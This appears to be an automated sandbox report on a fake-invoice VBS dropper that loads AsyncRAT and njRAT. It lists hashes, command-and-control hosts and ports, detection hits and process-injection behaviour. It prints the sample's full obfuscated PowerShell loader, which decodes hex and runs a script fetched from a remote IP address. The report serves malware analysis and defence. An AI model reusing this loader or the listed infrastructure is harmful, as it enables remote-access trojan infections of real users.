asyncrat | c083348abc25e7c20eed06e9ceddd94af7b4787ea22dbca312d4b9e8504cf882

General

Target

V00GH01_Invoice_Copy.vbs
Size

3KB
MD5

f0eb4b843b026d5d100f69d47c2f576e
SHA1

f29356a70659a502ef8eea82fef2cc05e92d80fd
SHA256

c083348abc25e7c20eed06e9ceddd94af7b4787ea22dbca312d4b9e8504cf882
SHA512

57165f90091e183b248dc0cb8f7a8ca8dffa68818b4bbc045e7128ed13326c71e94de1111daefcd6875438afe3b2b765d51195ea1e3a0f8e986c74956f00c801

Score

10^/10

asyncrat njrat default hacked rat suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://52.188.147.221/All%20in%20One/fj.txt

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

jilldoggyy.duckdns.org:7840

jilldoggyy.duckdns.org:7829

jilldoggyy.duckdns.org:7841

103.147.185.192:7840

103.147.185.192:7829

103.147.185.192:7841

Mutex

AsyncMutex_6SI8OkPnk

Attributes

anti_vm
false
bsod
false
delay
3
install
false
install_folder
%AppData%
pastebin_config
null

aes.plain

Extracted

Family

njrat

Version

v4.0

Botnet

HacKed

C2

20.194.35.6:8023

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/5096-156-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/5096-157-0x000000000040C77E-mapping.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

2 4780 powershell.exe
8 4780 powershell.exe

flow	pid	process
2	4780	powershell.exe
8	4780	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 4780 set thread context of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 set thread context of 4152	4780	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

4780 powershell.exe
4780 powershell.exe
4780 powershell.exe

pid	process
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

Processes:

powershell.exeaspnet_compiler.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	4780	powershell.exe
Token: SeDebugPrivilege	5096	aspnet_compiler.exe
Token: SeDebugPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe
Token: 33	4152	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	4152	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 4732 wrote to memory of 4780	4732	WScript.exe	powershell.exe
PID 4732 wrote to memory of 4780	4732	WScript.exe	powershell.exe
PID 4780 wrote to memory of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 5096	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 4152	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 4152	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 4152	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 4152	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 4152	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 4152	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 4152	4780	powershell.exe	aspnet_compiler.exe
PID 4780 wrote to memory of 4152	4780	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\V00GH01_Invoice_Copy.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://52H-H188H-H147H-H221/All%20in%20One/fjH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4780

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4152

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4152-161-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4152-174-0x0000000005440000-0x0000000005441000-memory.dmp

Filesize
4KB

Download
memory/4152-173-0x00000000054B0000-0x00000000054B1000-memory.dmp

Filesize
4KB

Download
memory/4152-172-0x00000000054A0000-0x00000000054A1000-memory.dmp

Filesize
4KB

Download
memory/4152-167-0x00000000059B0000-0x00000000059B1000-memory.dmp

Filesize
4KB

Download
memory/4152-166-0x0000000004E30000-0x0000000004E31000-memory.dmp

Filesize
4KB

Download
memory/4152-162-0x000000000040836E-mapping.dmp

Download
memory/4780-126-0x000001B6FE9E0000-0x000001B6FE9E1000-memory.dmp

Filesize
4KB

Download
memory/4780-155-0x000001B6FD990000-0x000001B6FD994000-memory.dmp

Filesize
16KB

Download
memory/4780-144-0x000001B6FDDB8000-0x000001B6FDDB9000-memory.dmp

Filesize
4KB

Download
memory/4780-133-0x000001B6FDDB6000-0x000001B6FDDB8000-memory.dmp

Filesize
8KB

Download
memory/4780-115-0x0000000000000000-mapping.dmp

Download
memory/4780-125-0x000001B6FDDB3000-0x000001B6FDDB5000-memory.dmp

Filesize
8KB

Download
memory/4780-124-0x000001B6FDDB0000-0x000001B6FDDB2000-memory.dmp

Filesize
8KB

Download
memory/4780-120-0x000001B6FDD60000-0x000001B6FDD61000-memory.dmp

Filesize
4KB

Download
memory/5096-156-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5096-157-0x000000000040C77E-mapping.dmp

Download
memory/5096-168-0x00000000058D0000-0x00000000058D1000-memory.dmp

Filesize
4KB

Download
memory/5096-171-0x0000000005ED0000-0x0000000005ED1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads